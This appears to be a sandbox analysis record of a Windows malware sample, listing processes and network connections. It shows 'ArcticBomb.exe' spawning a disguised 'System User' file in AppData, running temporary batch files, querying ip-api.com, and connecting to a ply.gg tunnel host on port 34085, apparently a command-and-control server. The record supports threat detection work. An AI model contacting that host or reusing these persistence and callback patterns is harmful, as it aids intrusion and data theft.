"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3420,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4500,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4584 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4896 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5072 /prefetch:8
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff607b64698,0x7ff607b646a4,0x7ff607b646b0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4824,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4372 /prefetch:1
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5216,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4472,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3536 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3200,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3412 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5572,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3536 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5596,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5276 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5820,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5824 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5192,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5972 /prefetch:8
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\Desktop\ArcticBomb.exe
"C:\Users\Admin\Desktop\ArcticBomb.exe"
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Windows\SYSTEM32\CMD.EXE
"CMD.EXE"
C:\Windows\system32\reset.exe
reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nereml.bat" "
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xebxog.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8f686cc40,0x7ff8f686cc4c,0x7ff8f686cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=2444 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3172 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3124,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=4548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=4836 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=4820 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4852,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=4732 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4644,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=4848 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4004,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4000,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=1452 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5324,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=5332 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Mandela-Classic-main\Mandela-Classic-main\bin\ldid"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\Mandela-Classic-main\Mandela-Classic-main\bin\ldid
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d27a075-20de-40ed-a763-6e6973f0672f} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d461ecf8-89c4-40c5-823d-105e83daf8a5} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 2952 -prefMapHandle 2812 -prefsLen 24741 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6639164-ee5b-40e4-8e74-d1a01461ae7a} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3068 -childID 2 -isForBrowser -prefsHandle 3860 -prefMapHandle 3856 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1730f13c-d09c-40e9-8d57-2bbf79ad07e6} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4920 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4916 -prefMapHandle 4956 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8773619-627e-4ae5-94e9-d99dd539e185} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5292 -childID 3 -isForBrowser -prefsHandle 5272 -prefMapHandle 5260 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f601809e-abe8-4c1a-a1b3-a7d64ff38859} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5436 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61399222-0788-4aa9-9c4e-d4729f0826e6} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5640 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {372b4bcd-878b-471a-aeee-0c7f5990c82d} 3860 "\\.\pipe\gecko-crash-server-pipe.3860" tab
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Mandela-Classic-main\Mandela-Classic-main\Makefile
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Mandela-Classic-main\Mandela-Classic-main\bin\ldid
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5392,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3548 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3012,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=5756 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5880,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=5828 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\version -1.0.rar"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4032,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3240 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5708,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5528,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5512,i,4772327168545849200,12120811875476442838,262144 --variations-seed-version=20240903-050042.706000 --mojo-platform-channel-handle=5828 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:34085 | tcp | |
| N/A | 127.0.0.1:34085 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | running-locks.gl.at.ply.gg | udp |
| US | 147.185.221.22:34085 | running-locks.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 22.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.178.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | drive.google.com | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c36.gcp.gvt2.com | udp |
| SG | 35.213.145.237:443 | e2c36.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| SG | 35.213.145.237:443 | e2c36.gcp.gvt2.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.145.213.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.178.3:443 | id.google.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 172.217.169.46:443 | www.youtube.com | tcp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.6:443 | static.doubleclick.net | tcp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.14:443 | www.youtube.com | tcp |
| GB | 142.250.200.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
